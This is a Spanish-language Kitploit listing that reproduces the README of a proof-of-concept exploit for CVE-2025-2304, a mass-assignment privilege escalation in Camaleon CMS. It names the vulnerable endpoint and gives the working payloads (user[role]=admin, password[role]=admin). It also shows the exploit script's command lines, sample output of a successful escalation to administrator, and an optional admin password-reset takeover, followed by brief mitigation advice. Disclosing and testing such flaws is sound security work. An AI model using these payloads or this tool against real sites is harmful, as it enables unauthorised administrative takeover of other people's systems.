Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-2304-POC — Prueba de concepto para CVE-2025-2304 — crítica (CVSS 9.4) escalada de privilegios por asignación masiva en Camaleon CMS. | Kitploit
Herramientas/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Escalada de PrivilegiosGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Prueba de concepto para CVE-2025-2304 — crítica (CVSS 9.4) escalada de privilegios por asignación masiva en Camaleon CMS.

Ver Repositorio
1034hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-2304 PoC - Escalada de Privilegios en Camaleon CMS

CVE CVSS Python License

Una prueba de concepto (PoC) para CVE-2025-2304, una vulnerabilidad crítica de asignación masiva en Camaleon CMS que permite la escalada de privilegios de usuarios con pocos permisos a administradores.

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Tabla de Contenidos

  • Resumen
  • Detalles de la Vulnerabilidad
  • Características
  • Instalación
  • Uso
  • Ejemplos
  • Versiones Afectadas
  • Mitigación
  • Aviso Legal
  • Referencias
  • Autor

🔍 Resumen

CVE-2025-2304 es una vulnerabilidad crítica de asignación masiva en Camaleon CMS que existe en el método updated_ajax de UsersController. La vulnerabilidad se origina por el uso del peligroso método permit! de Rails, que permite que todos los parámetros pasen sin ningún filtro.

Esta PoC demuestra cómo un usuario autenticado con pocos privilegios puede escalar al rol de administrador inyectando parámetros no autorizados durante operaciones de cambio de contraseña.

Puntuación CVSS: 9.4 (Crítica)

🐛 Detalles de la Vulnerabilidad

Causa Raíz

El código vulnerable utiliza params.require(:user).permit! que acepta todos los parámetros suministrados por el usuario sin validación:

def updated_ajax
  user_params = params.require(:user).permit!  # ¡PELIGROSO!
  current_user.update(user_params)
end

Explotación

Un atacante puede inyectar parámetros adicionales como user[role]=admin junto a campos legítimos de cambio de contraseña, provocando que la aplicación actualice el rol del usuario a administrador.

Vector de Ataque:

  1. Autenticarse como usuario con pocos privilegios (por ejemplo, rol "client")
  2. Enviar una solicitud POST manipulada a /admin/users/{id}/updated_ajax
  3. Inyectar el parámetro user[role]=admin
  4. El rol del usuario se eleva a administrador

✨ Características

  • ✅ Prueba Segura: Conserva la contraseña del usuario durante la explotación
  • ✅ Múltiples Payloads: Prueba más de 7 técnicas diferentes de inyección
  • ✅ Detección de Versión: Detecta automáticamente versiones vulnerables del CMS
  • ✅ Opción No Destructiva: Bandera --no-password-field para la prueba más segura
  • ✅ Soporte de Proxy: Integración con Burp Suite/ZAP para análisis manual
  • ✅ Modo Verboso: Salida detallada para depuración
  • ✅ Toma de Control de Admin: Ataque opcional de restablecimiento de contraseña de administrador
  • ✅ Salida con Código de Colores: Indicadores visuales claros de éxito/fracaso

📦 Instalación

Requisitos

  • Python 3.7+
  • pip (gestor de paquetes de Python)

Clonar el Repositorio

git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Instalar Dependencias

pip install -r requirements.txt

O instalar manualmente:

pip install requests beautifulsoup4

🚀 Uso

Sintaxis Básica

python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Opciones de Línea de Comandos

positional arguments:
  target                URL objetivo (ej. http://target.com)

required arguments:
  -u, --username        Nombre de usuario existente para autenticación
  -p, --password        Contraseña del usuario

optional arguments:
  -h, --help            Mostrar mensaje de ayuda y salir
  -v, --verbose         Salida detallada (mostrar todas las solicitudes)
  --proxy PROXY         Proxy HTTP para inspección de tráfico (ej. http://127.0.0.1:8080)
  --no-password-field   Probar explotación sin campos de contraseña (más seguro)
  --skip-admin-test     Omitir prueba destructiva de restablecimiento de contraseña de administrador

📚 Ejemplos

Prueba Estándar (Recomendada)

Probar con credenciales de usuario existentes conservando la contraseña:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Prueba Más Segura (Sin Campos de Contraseña)

Probar sin incluir campos de contraseña en el payload de explotación:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Con Proxy de Burp Suite

Enrutar el tráfico a través de Burp Suite para inspección manual:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Modo Verboso

Habilitar salida detallada mostrando todas las solicitudes y respuestas:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Omitir Pruebas Destructivas

Probar solo la escalada de privilegios, omitir el restablecimiento de contraseña de administrador:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Ejemplo de Salida

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 Versiones Afectadas

VersiónEstado
< 2.9.1❌ Vulnerable
≥ 2.9.1✅ Corregido

Específicamente vulnerables:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x y anteriores

🛡️ Mitigación

Acciones Inmediatas

  1. Actualizar a la versión 2.9.1 o posterior

    gem update camaleon_cms
    
  2. Auditar las Cuentas de Usuario

    • Verificar cambios inesperados de privilegios
    • Revisar los registros de modificación de roles de usuario
    • Buscar solicitudes POST sospechosas a /users/*/updated_ajax
Descargar herramienta